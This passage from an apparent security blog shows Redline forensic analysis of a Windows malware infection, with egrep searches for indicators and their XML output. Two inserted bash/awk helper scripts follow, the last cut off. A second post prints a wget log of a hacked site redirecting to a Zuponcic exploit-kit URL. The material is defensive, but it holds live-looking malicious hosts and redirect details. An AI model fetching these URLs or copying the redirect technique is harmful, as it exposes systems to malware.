<a href="http://2.bp.blogspot.com/-1mvYG4N2XMw/U9mFcdMSCaI/AAAAAAAAAgc/BWJ4jsfStU8/s1600/Redline_process-start-mal-exe-3a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1mvYG4N2XMw/U9mFcdMSCaI/AAAAAAAAAgc/BWJ4jsfStU8/s1600/Redline_process-start-mal-exe-3a.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-vBHkwIwcm_I/U9mFce6FKZI/AAAAAAAAAgg/0WDkYCdH49c/s1600/Redline_process-start-mal-exe-3b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-vBHkwIwcm_I/U9mFce6FKZI/AAAAAAAAAgg/0WDkYCdH49c/s1600/Redline_process-start-mal-exe-3b.png" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE process opened port listener:</span><span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
</div>
<div style="text-align: left;">
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" height="*" width="800" /></a></div>
</div>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-OLc0v8W948k/U9gUVojB8ZI/AAAAAAAAAeI/bniLYkPRpjc/s1600/Redline_process-start-mal-exe-ports-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-OLc0v8W948k/U9gUVojB8ZI/AAAAAAAAAeI/bniLYkPRpjc/s1600/Redline_process-start-mal-exe-ports-1a.png" /></a></div>
<br />
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Registry key with binary data created:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ex8-5IReIkg/U9gYuDac-BI/AAAAAAAAAe8/b5vUa1RrgwI/s1600/Redline_registry-malware-binary-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ex8-5IReIkg/U9gYuDac-BI/AAAAAAAAAe8/b5vUa1RrgwI/s1600/Redline_registry-malware-binary-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-kR3P5pNpi4k/U9gYuOGyCCI/AAAAAAAAAfA/KhiPbd3iEsw/s1600/Redline_registry-malware-binary-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-kR3P5pNpi4k/U9gYuOGyCCI/AAAAAAAAAfA/KhiPbd3iEsw/s1600/Redline_registry-malware-binary-1a.png" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
</div>
<span style="font-family: Arial,Helvetica,sans-serif;">Creating persistence using registry RUN key under HKCU:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dcVrajyb2ZM/U9l6EBDRggI/AAAAAAAAAfs/Hu1CzdwU2lg/s1600/Redline_persistence-registry-mal-exe-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dcVrajyb2ZM/U9l6EBDRggI/AAAAAAAAAfs/Hu1CzdwU2lg/s1600/Redline_persistence-registry-mal-exe-2.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Y60QCKhIcVQ/U9l6EDYFPtI/AAAAAAAAAfo/_HDZEIGrfyE/s1600/Redline_persistence-registry-mal-exe-2a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Y60QCKhIcVQ/U9l6EDYFPtI/AAAAAAAAAfo/_HDZEIGrfyE/s1600/Redline_persistence-registry-mal-exe-2a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Creation of port listeners:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-8zm4la49Dw8/U9mEWQpZChI/AAAAAAAAAgM/ZsbUmLK3KXE/s1600/Redline_port-create-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-8zm4la49Dw8/U9mEWQpZChI/AAAAAAAAAgM/ZsbUmLK3KXE/s1600/Redline_port-create-1a.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-T-P42VLfZxU/U9mEWTJhL1I/AAAAAAAAAgQ/nncoUGoOmEo/s1600/Redline_port-create-1b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-T-P42VLfZxU/U9mEWTJhL1I/AAAAAAAAAgQ/nncoUGoOmEo/s1600/Redline_port-create-1b.png" /></a></div>
<br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Using Bash-Fu on Redline XML data</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Some bash commands (possibly run under Cygwin on Windows) can be very useful and powerful for working with the Redline XML audit files. Here are some examples.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Searching for some network indicators:</span><br />
<pre><span style="font-family: 'Courier New',Courier,monospace;">
<b>$ time egrep -ci "(prodigymsnteregala.com|\/js\/java\.js|ANLxMYn\.jar|qkejZDj\.jar|\/listing\/chn\/all\.html|93\.115\.88\.220)" *.* | egrep -v ":0"</b>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:4
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:5
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:2
real 0m17.630s
user 0m17.456s
sys 0m0.171s
<b>$ egrep -i "(prodigymsnteregala.com|\/js\/java\.js|ANLxMYn\.jar|qkejZDj\.jar|\/listing\/chn\/all\.html|93\.115\.88\.220)" *.*</b>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/favicon.ico</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/tr.gif</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/js/java.js</SourceURL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com/favicon.ico</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>:Host: mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</Path>
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:<KeyPath>Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</KeyPath>
<b>$ egrep -in -C 10 "prodigymsnteregala.com" w32registryapi.* | egrep -m 1 -A 15 "<RegistryItem " | egrep -m 1 -B 15 "</RegistryItem>"</b>
6674509-<RegistryItem xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="FEBFAC4B-E50C-469E-A25A-2C42BE0653BE" created="2014-07-14T01:14:20Z"><Username>TOMS-VM-WIN7X64\Tom</Username>
6674510-<SecurityID>S-1-5-21-3096987436-3122932343-3109395949-1000</SecurityID>
6674511:<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</Path>
6674512-<Hive>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000</Hive>
6674513:<KeyPath><span style="background-color: yellow;">Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</span></KeyPath>
6674514-<Type>REG_KEY</Type>
6674515-<Modified>2014-07-13T22:01:39Z</Modified>
6674516-<NumSubKeys>0</NumSubKeys>
6674517-<NumValues>0</NumValues>
6674518-</RegistryItem>
</span></pre>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Searching for some host indicators (filenames, registry keys):</span>
<br />
<pre><span style="font-family: 'Courier New',Courier,monospace;">
<b>$ time egrep -ci "(DPNLOBBYG.EXE|483759317.TMP|Egkyxzdcin|7538554d-326909f3|JXZFUV)" *.* | egrep -v ":0"</b>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:8
w32apifiles.issues.6F4XA71eDhdfIujMDqoLCI:1
w32eventlogs.eOZaQVjGh3PdAuYt0LXxMR:8
w32prefetch.biHxIPURFOEdQgUKV9vyvp:12
w32processes-memory.jblWPV86pwBeohXjunTY1h:3
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:20
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:5
real 0m17.755s
user 0m17.565s
sys 0m0.170s
<b>$ egrep -i "(DPNLOBBYG.EXE|483759317.TMP|Egkyxzdcin|7538554d-326909f3|JXZFUV)" w32apifiles.* w32scripting-persistence.*</b>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Users\Tom\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\7538554d-326909f3</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>7538554d-326909f3</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Users\Tom\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\7538554d-326909f3.idx</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>7538554d-326909f3.idx</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Windows\Prefetch\483759317.TMP-EB4905C2.pf</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>483759317.TMP-EB4905C2.pf</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Windows\Prefetch\DPNLOBBYG.EXE-603267D1.pf</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>DPNLOBBYG.EXE-603267D1.pf</FileName>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<RegText>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</RegText>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FilePath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FilePath>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FullPath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FullPath>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FileName>dpnlobbyg.exe</FileName>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<Text>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</Text>
<b>$ egrep -in -B 10 -A 120 "DPNLOBBYG.EXE" w32scripting-persistence.* | egrep -m 1 -A 100 "<PersistenceItem " | egrep -m 1 -B 100 "</PersistenceItem>"</b>
96-<<span style="background-color: #6fa8dc;">PersistenceItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="C10D94E7-43A9-4160-A0EC-2C5BB246697F" created="2014-07-14T01:11:17Z"><PersistenceType>registry</PersistenceType>
97-<RegPath>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLLS</RegPath>
98:<RegText>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</RegText>
99-<RegOwner>NT AUTHORITY\SYSTEM</RegOwner>
100-<RegModified>2014-07-13T22:44:51Z</RegModified>
101:<FilePath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FilePath>
102-<FileOwner>TOMS-VM-WIN7X64\Tom</FileOwner>
103-<FileCreated>2014-07-13T22:01:47Z</FileCreated>
104-<FileModified>2014-07-13T22:01:47Z</FileModified>
105-<FileAccessed>2014-07-13T22:01:47Z</FileAccessed>
106-<FileChanged>2014-07-13T22:01:47Z</FileChanged>
107-<md5sum><span style="background-color: yellow;">105ead6f908f0d8cbab11a0f4408d373</span></md5sum>
108-<<span style="background-color: cyan;">FileItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="7B6CDDEB-3A25-4568-9D31-AF18EB68C23E" created="2014-07-14T01:11:17Z"><DevicePath>\Device\HariskVolume1</DevicePath>
109:<FullPath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FullPath>
110-<Drive>c</Drive>
111-<FilePath>Users\Tom\AppData\Roaming</FilePath>
112:<FileName>dpnlobbyg.exe</FileName>
113-<FileExtension>exe</FileExtension>
114-<SizeInBytes>276992</SizeInBytes>
115-<Created>2014-07-13T22:01:47Z</Created>
116-<Modified>2014-07-13T22:01:47Z</Modified>
117-<Accessed>2014-07-13T22:01:47Z</Accessed>
118-<Changed>2014-07-13T22:01:47Z</Changed>
119-<FileAttributes>ReadOnly Hidden System Archive</FileAttributes>
120-<Username>TOMS-VM-WIN7X64\Tom</Username>
121-<SecurityID>S-1-5-21-3096987436-3122932343-3109395949-1000</SecurityID>
122-<SecurityType>SidTypeUser</SecurityType>
123-<Md5sum><span style="background-color: yellow;">105ead6f908f0d8cbab11a0f4408d373</span></Md5sum>
124-<<span style="background-color: cyan;">PEInfo</span>><Type>Executable</Type>
125-<Subsystem>Windows_GUI</Subsystem>
126-<BaseAddress>4194304</BaseAddress>
127-<PETimeStamp>2012-02-23T05:41:05Z</PETimeStamp>
128-<PEChecksum><PEFileRaw>0</PEFileRaw>
129-<PEFileAPI>0</PEFileAPI>
130-<PEComputedAPI>287748</PEComputedAPI>
131-</PEChecksum>
132-<ExtraneousBytes>229376</ExtraneousBytes>
133-<<span style="background-color: orange;">DetectedAnomalies</span>><string><span style="background-color: yellow;">checksum_is_zero</span></string>
134-<string><span style="background-color: yellow;">contains_eof_data</span></string>
135-</<span style="background-color: orange;">DetectedAnomalies</span>>
136-<Sections><NumberOfSections>3</NumberOfSections>
137-<ActualNumberOfSections>3</ActualNumberOfSections>
138-<Section><Name>.text</Name>
139-<Type>None</Type>
140-<SizeInBytes>43008</SizeInBytes>
141-<DetectedCharacteristics>Read Execute Code</DetectedCharacteristics>
142-<Entropy AverageValue="0.77262239772402574"/>
143-</Section>
144-<Section><Name>.rsrc</Name>
145-<Type>None</Type>
146-<SizeInBytes>3584</SizeInBytes>
147-<DetectedCharacteristics>Read</DetectedCharacteristics>
148-<Entropy AverageValue="0.54873274859376076"/>
149-</Section>
150-<Section><Name>.reloc</Name>
151-<Type>None</Type>
152-<SizeInBytes>512</SizeInBytes>
153-<DetectedCharacteristics>Read</DetectedCharacteristics>
154-<Entropy AverageValue="0.048149053317863157"/>
155-</Section>
156-</Sections>
157-</<span style="background-color: cyan;">PEInfo</span>>
158-<PeakEntropy>0.77262239772402574</PeakEntropy>
159-<PeakCodeEntropy><span style="background-color: yellow;">0.77262239772402574</span></PeakCodeEntropy>
160-</<span style="background-color: cyan;">FileItem</span>>
161-<<span style="background-color: cyan;">RegistryItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="91340226-5657-48BB-9DAB-44F07BFD14BD" created="2014-07-14T01:11:17Z"><KeyPath>Microsoft\ndows\CurrentVersion\Run\</KeyPath>
162-<Type>REG_SZ</Type>
163-<Modified>2014-07-13T22:44:51Z</Modified>
164-<span style="background-color: yellow;"><ValueName>DLLS</ValueName></span>
165-<Username>NT AUTHORITY\SYSTEM</Username>
166:<span style="background-color: yellow;"><Text>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</Text></span>
167-<ReportedLengthInBytes>86</ReportedLengthInBytes>
168-<Hive>HKEY_CURRENT_USER\Software</Hive>
169-<Path>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLLS</Path>
170-<SecurityID>S-1-5-18</SecurityID>
171-</<span style="background-color: cyan;">RegistryItem</span>>
172-</<span style="background-color: #6fa8dc;">PersistenceItem</span>>
</span></pre>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Looking at the raw XML should usually help when creating IOCs later.</span>
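<span style="font-family: Arial,Helvetica,sans-serif;">As an added example (not code from the original post), the same two steps done in a small bash/awk script: per-file hit counts for an indicator regex, and extraction of every complete Redline item (RegistryItem, PersistenceItem, ...) that contains a hit, without guessing the grep -A/-B context size. The function names, the sample audit files and their placeholder uids are constructed for this example; the indicator values are the ones from the listings above.</span><br />

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: XML-aware context extraction
# for Redline audit files. The post guesses the context with "grep -B/-A N";
# redline_items prints every <ELEMENT ...>...</ELEMENT> block that contains a
# line matching REGEX (case-insensitive, so keep the regex free of uppercase
# character classes), however many lines the block spans, and reports all
# matching items instead of only the first one.
#   usage: redline_items ELEMENT REGEX FILE...
redline_items() {
    _elem=$1 _re=$2
    shift 2
    # pass element name and regex through the environment so that awk does not
    # mangle backslashes the way "awk -v" would
    RL_ELEM="$_elem" RL_RE="$_re" awk '
        BEGIN { elem = ENVIRON["RL_ELEM"]; re = tolower(ENVIRON["RL_RE"]) }
        # opening tag of the wanted element: start buffering a new item
        $0 ~ ("<" elem "[ >]") { inside = 1; buf = ""; hit = 0 }
        inside {
            buf = buf $0 "\n"
            if (tolower($0) ~ re) hit = 1
        }
        # closing tag: emit the buffered item only if one of its lines matched
        inside && $0 ~ ("</" elem ">") {
            if (hit) { printf "== %s ==\n%s", FILENAME, buf; found++ }
            inside = 0
        }
        END { if (found) exit 0; exit 1 }
    ' "$@"
}

# Per-file hit counts for an indicator regex, the post's first command as a
# function; -H forces the "file:count" prefix even when only one file is given
# (plain "grep -c" would omit it), and files with zero hits are dropped.
#   usage: redline_hit_counts REGEX FILE...
redline_hit_counts() {
    _re=$1
    shift
    grep -HciE -- "$_re" "$@" | grep -v ':0$'
}

# Constructed sample data mimicking two Redline audit files (paths, hash and
# indicator values are the ones from the listings above; the uids are
# placeholders). The files are left in $tmpdir for inspection.
tmpdir=$(mktemp -d)
cat > "$tmpdir/w32registryapi.sample" <<'EOF'
<RegistryItem uid="PLACEHOLDER-UID-1" created="2014-07-14T01:14:20Z">
<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Run</Path>
<Type>REG_KEY</Type>
</RegistryItem>
<RegistryItem uid="PLACEHOLDER-UID-2" created="2014-07-14T01:14:20Z">
<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</Path>
<Type>REG_KEY</Type>
<Modified>2014-07-13T22:01:39Z</Modified>
</RegistryItem>
EOF
cat > "$tmpdir/w32scripting-persistence.sample" <<'EOF'
<PersistenceItem uid="PLACEHOLDER-UID-3" created="2014-07-14T01:11:17Z">
<PersistenceType>registry</PersistenceType>
<RegPath>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLLS</RegPath>
<RegText>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</RegText>
<FileItem uid="PLACEHOLDER-UID-4" created="2014-07-14T01:11:17Z">
<FullPath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FullPath>
<FileName>dpnlobbyg.exe</FileName>
<Md5sum>105ead6f908f0d8cbab11a0f4408d373</Md5sum>
</FileItem>
</PersistenceItem>
EOF

# Demo run: counts per file, then the complete items around each hit
redline_hit_counts 'prodigymsnteregala\.com|dpnlobbyg\.exe' "$tmpdir"/*.sample
redline_items RegistryItem 'prodigymsnteregala\.com' "$tmpdir/w32registryapi.sample"
redline_items PersistenceItem 'dpnlobbyg\.exe' "$tmpdir/w32scripting-persistence.sample"
```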
<br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Conclusion</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Mandiant's Redline software is free to download and use. I find it amazing how much detail can be found by analyzing a host with Redline and how easy it is to create a timeline for analysis.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Redline can combine disk and memory artifacts in a timeline, showing processes created and ports opened in time relation to files and registry keys created.</span><br />
<br />
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><span style="font-family: Arial,Helvetica,sans-serif;">I think Redline is much more useful than what it costs! :-)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Are you using Redline yet and have some feedback or suggestions? I'd love to hear it...</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">In the next post I plan to show how to create IOCs from this analysis and how to check for IOC matches on a host. Stay tuned...</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Cheers,</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">@c_APT_ure</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
</div>
<h2>Two years later... (TomU, 2014-06-03)</h2>
By chance I just noticed that I wrote the <a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup Finder</a> blog post exactly two years ago.<br />
<br />
So it's time to celebrate the second anniversary :-)<br />
<br />
Well, I was wondering if anyone else is currently detecting the .htaccess infections that Ponmocup Finder (PF) reports. Let's see...<br />
<br />
Let's just look at any of the almost 500 domains currently being detected by PF as infected.<br />
<br />
http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-days-sort.txt<br />
<br />
<pre>439 www.pino-travel.com
439 www.log-in-verlag.de
438 www.oople.com
438 www.franken-gmbh.de
438 www.brichzin.de
<span style="background-color: yellow;">438 www.bad-saulgau.de</span>
437 www.vitaminbude.de</pre>
<br />
This German site has been seen infected for more than 430 days.<br />
<br />
Here's today's "evidence" from my <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder_scripts.txt" target="_blank">PF scripts</a> that this domain is infected. It sets a cookie and redirects to Zuponcic Kit, as discussed in previous (linked) blogs and presentations.<br />
<br />
http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/www.bad-saulgau.de_wget_log.txt<br />
<br />
<pre>--12:06:50-- http://www.bad-saulgau.de/
=> `www.bad-saulgau.de_out.txt'
Resolving www.bad-saulgau.de... 82.165.95.226
Connecting to www.bad-saulgau.de|82.165.95.226|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Tue, 03 Jun 2014 10:06:50 GMT
Server: Apache
<span style="background-color: yellow;">Set-Cookie: tTF=50; path=/; domain=www.bad-saulgau.de; expires=Wed, 11-Jun-2014 08:44:50 GMT</span>
<span style="background-color: yellow;">Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522</span>
Content-Length: 536
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522 [following]
--12:06:50-- http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522
=> `www.bad-saulgau.de_out.txt'
Resolving solent.alloyradianttubes.com... 31.210.96.155
Connecting to solent.alloyradianttubes.com|31.210.96.155|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.1.4
Date: Tue, 03 Jun 2014 10:06:50 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://www.google.com/
Location: http://www.google.com/ [following]</pre>
The redirection to Google is an anti-detection method of Zuponcic Kit, also <a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">discussed before</a> on the Fox-IT blog.<br />
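An added example, not part of this post and not the Ponmocup Finder scripts: a bash/awk check that flags the redirect chain shown in the wget log above (the first hop answers 302, sets a cookie and points to another domain; a later hop bounces to google.com). The function name, the temp files and the benign log are constructed; the infected log is built from the lines quoted above with the kit URL's query string dropped.<br />

```bash
#!/usr/bin/env bash
# Added example (not the post's or Ponmocup Finder's code): flag the .htaccess
# redirect pattern from the wget log above in a "wget -S" style log.
# Verdict: exit 0 and a SUSPICIOUS line when the scanned site answers the first
# request with a 30x that sets a cookie and points off-site AND a later hop
# redirects to google.com; exit 1 otherwise. Works with both the old
# "--HH:MM:SS--" and the newer "--YYYY-MM-DD HH:MM:SS--" wget line prefixes.
#   usage: zuponcic_chain_check WGET_LOG
zuponcic_chain_check() {
    awk '
        function host(u) {            # scheme://host[:port]/path -> host
            sub(/^https?:\/\//, "", u); sub(/[\/:].*$/, "", u); return tolower(u)
        }
        # each "--time-- URL" line starts a new hop of the redirect chain
        /^--.*-- +https?:\/\// { hop++; url[hop] = $NF; next }
        /HTTP\/1\.[01] 30[1237]/            { redir[hop] = 1 }
        /Set-Cookie:/                       { cookie[hop] = 1 }
        # keep only the header Location, not the later "... [following]" echo
        /^ *Location:/ && !(hop in loc)     { loc[hop] = $2 }
        END {
            if (hop < 1) exit 1
            entry = redir[1] && cookie[1] && host(loc[1]) != host(url[1])
            for (h = 2; h <= hop; h++)
                if (host(loc[h]) ~ /(^|\.)google\.com$/) bounce = h
            if (entry && bounce) {
                printf "SUSPICIOUS: %s set a cookie and redirected to %s, hop %d bounced to google.com\n", host(url[1]), host(loc[1]), bounce
                exit 0
            }
            print "no .htaccess redirect chain found"
            exit 1
        }
    ' "$1"
}

tmpdir=$(mktemp -d)
# Constructed from the wget log quoted above (kit URL query string dropped)
cat > "$tmpdir/infected.log" <<'EOF'
--12:06:50-- http://www.bad-saulgau.de/
=> `www.bad-saulgau.de_out.txt'
Resolving www.bad-saulgau.de... 82.165.95.226
Connecting to www.bad-saulgau.de|82.165.95.226|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Server: Apache
Set-Cookie: tTF=50; path=/; domain=www.bad-saulgau.de; expires=Wed, 11-Jun-2014 08:44:50 GMT
Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php
Content-Type: text/html; charset=iso-8859-1
Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php [following]
--12:06:50-- http://solent.alloyradianttubes.com/neo/darla/php/fc.php
Resolving solent.alloyradianttubes.com... 31.210.96.155
HTTP request sent, awaiting response...
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.1.4
Location: http://www.google.com/
Location: http://www.google.com/ [following]
EOF
# Constructed benign log: a direct 200 answer that also sets a cookie
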